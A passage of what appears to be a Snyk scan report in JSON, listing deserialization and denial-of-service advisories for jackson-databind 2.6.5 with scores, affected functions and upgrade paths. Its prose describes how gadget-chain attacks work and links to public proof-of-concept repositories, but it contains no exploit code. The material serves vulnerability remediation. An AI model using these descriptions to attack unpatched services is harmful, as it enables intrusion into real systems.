\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36188" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:39:28.531700Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:32Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:03.468032Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Poc" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.757298Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36181" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:41:09.172252Z", - "functions_new": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.686589Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Yangkun (ICSL)" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2854", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", - "title": "GitHub Release" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": 
"2024-03-11T09:50:15.847219Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:04.169362Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:15.847219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", - "epssDetails": { - "percentile": "0.74700", - "probability": "0.00431", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-20190" - ], - "CWE": [ - "CWE-502", - "CWE-918" - ], - "GHSA": [ - "GHSA-5949-rw7g-wx7w" - ], - "RHSA": [ - "RHSA-1610966837463990" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-18T12:50:16.466618Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-16T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-18T17:23:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:17.193594Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.7" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9)", - "[2.8.0,2.8.11.4)", - "[2.7.0,2.7.9.6)", - "[,2.6.7.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9", - "2.8.11.4", - "2.7.9.6", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2326", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", - "title": "Github Release Tag" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12086", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "assigner": "Red Hat", - 
"severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:55.897269Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", - "epssDetails": { - "percentile": "0.74218", - "probability": "0.00415", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12086" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5ww9-j83m-q7qx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-05-19T10:19:10.287403Z", - "functions_new": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-17T18:12:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": 
"maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-05-17T18:12:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.785293Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.12.6.1", - "2.13.2.1" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when using nested objects." 
- }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", - "className": "UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2816", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/3416", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.056720Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", - "epssDetails": { - "percentile": "0.60309", - "probability": "0.00218", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36518" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-03-11T13:26:43.073121Z", - "functions_new": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": 
